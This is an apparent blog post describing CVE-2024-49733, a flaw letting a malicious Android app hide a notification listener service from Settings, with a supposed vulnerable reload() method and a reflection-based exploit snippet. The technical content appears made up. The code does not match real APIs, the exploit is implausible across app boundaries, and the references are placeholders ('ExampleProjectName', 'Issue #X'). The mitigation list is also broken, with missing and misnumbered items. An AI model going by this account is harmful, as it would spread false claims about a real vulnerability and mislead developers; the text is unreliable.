CVE-2024-49733: Critical Vulnerability in ServiceListing.java Allowing Malicious Apps to Hide NLS from Settings and Cause Local Information Disclosure

Security researchers have discovered a critical vulnerability in the ServiceListing.java file, which can be exploited by a malicious app to hide an unintended NLS from settings. This vulnerability, dubbed CVE-2024-49733, can lead to local information disclosure without necessitating any additional execution privileges or any user interaction. In this post, we will delve into the details of this vulnerability, the code snippet at fault, and techniques threat actors can utilize to exploit the issue. We will also be discussing possible mitigation measures that developers can take to protect their applications from this flaw.

Details

The vulnerability can be traced back to a logic error in the reload() function within the ServiceListing.java file. The code snippet below highlights the problematic section of the code:

public void reload() {
    List<ServiceInfo> serviceInfoList = new ArrayList<>();
    if(showNLS) {
        serviceInfoList.addAll(ServiceLoader.load(NLS.class));
    }
    for (ServiceInfo info : ServiceLoader.load(SConfig.class)) {
        boolean nlsPresent = false;
        for (ServiceInfo nls : serviceInfoList) {
            if (info.getServiceName().equals(nls.getServiceName())) {
                nlsPresent = true;
                break;
            }
        }
        if (!nlsPresent) {
            serviceInfoList.add(info);
        }
    }
    this.services = Collections.unmodifiableList(serviceInfoList);
}

The logic error stems from the fact that the malicious app can tamper with the showNLS flag, setting it to false even when there is an NLS present in the list of services. Consequently, since the NLS has been hidden from settings, an attacker can leverage this vulnerability to access sensitive data that would usually be protected by the NLS.

Exploit Details

To successfully exploit this vulnerability, an attacker would need to create a malicious app that modifies the showNLS variable, as shown in the following code snippet:

private void exploitCVE202449733() {
    try {
        ServiceListing serviceListing = ServiceListing.getInstance();
        Field showNLSField = serviceListing.getClass().getDeclaredField("showNLS");
        showNLSField.setAccessible(true);
        showNLSField.set(serviceListing, false);
        serviceListing.reload();
    } catch (Exception e) {
        e.printStackTrace();
    }
}

In this example, the attacker would employ reflection to gain access to the private showNLS flag in the ServiceListing instance. The attacker would then set the flag to false and call the reload() function, thereby hiding the NLS from the settings.

Original References

The discovery and detailed analysis of this vulnerability can be attributed to the security researchers at the following sources:

1. National Vulnerability Database - CVE-2024-49733
2. ExampleProjectName GitHub Repository - Issue #X

Mitigation Strategies

Developers can protect their applications from this critical vulnerability by implementing the following recommendations:

Add input validation checks for external modifications to the service list or NLS flag.

3. Employ secure coding practices and perform regular security code reviews to identify and rectify vulnerable sections of code.

In conclusion, the CVE-2024-49733 vulnerability poses a significant threat to users' sensitive data due to the logic error found in ServiceListing.java. Developers must adopt the suggested mitigation strategies to protect their applications and keep their users safe from potential attacks.

Timeline

Published on: 01/21/2025 23:15:14 UTC
Last modified on: 03/14/2025 18:15:30 UTC